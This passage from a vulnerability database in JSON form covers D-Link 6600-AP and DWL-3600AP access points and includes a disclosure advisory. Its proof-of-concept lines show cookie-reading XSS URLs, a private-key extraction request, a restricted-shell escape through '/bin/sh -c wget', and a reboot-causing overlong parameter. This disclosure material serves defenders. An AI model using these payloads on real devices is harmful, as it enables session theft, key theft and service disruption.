"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146268"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"date": "2019-08-01T13:15:13.960000",
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"date": "2019-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-146268"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"date": "2019-08-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"date": "2024-11-21T04:26:31.550000",
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Vulnerability related to cryptographic strength in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
],
"trust": 0.6
}
}
VAR-201908-0913
Vulnerability from variot - Updated: 2024-11-23 21:52
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated denial of service leading to the reboot of the AP via the admin.cgi?action=%s URI. D-Link 6600-AP and DWL-3600AP devices contain an authentication vulnerability. Service operation may be interrupted (DoS). The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot.
Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
2. Post-authenticated Certificate and RSA Private Key extraction through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
3. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0913",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14335",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14335",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29142",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-146271",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14335",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-14335",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14335",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14335",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29142",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1636",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146271",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-14335",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated denial of service leading to the reboot of the AP via the admin.cgi?action=%s URI. D-Link 6600-AP and DWL-3600AP The device contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. 
\nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n
### 3. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. 
\nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. 
\n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.3
},
{
"db": "NVD",
"id": "CVE-2019-14335",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29142",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146271",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-14335",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"id": "VAR-201908-0913",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
}
]
},
"last_update_date": "2024-11-23T21:52:00.625000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dlink.com/en/consumer"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP Local Denial of Service Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177605"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95745"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-287",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 2.6,
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14335"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
